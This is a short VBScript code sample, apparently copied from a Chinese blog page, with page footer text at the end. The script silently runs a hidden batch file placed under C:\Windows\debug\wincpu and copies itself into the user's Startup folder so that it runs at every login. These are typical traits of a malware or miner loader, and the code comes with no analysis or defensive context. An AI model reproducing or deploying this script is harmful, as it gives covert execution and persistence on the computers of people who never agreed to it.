set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C C:\Windows\debug\wincpu\go.bat", 0, TRUE)
set wshshell=createobject("wscript.shell")
flr=wshshell.specialfolders("desktop")
Set WshShell = CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
startup = WshShell.SpecialFolders("startup")
vbs = startup & "\" & WScript.ScriptName
If not fso.FileExists(vbs) Then
fso.CopyFile WScript.ScriptFullName,vbs
DIM objShell
End If
一段代码样本
最新推荐文章于 2022-05-03 07:08:34 发布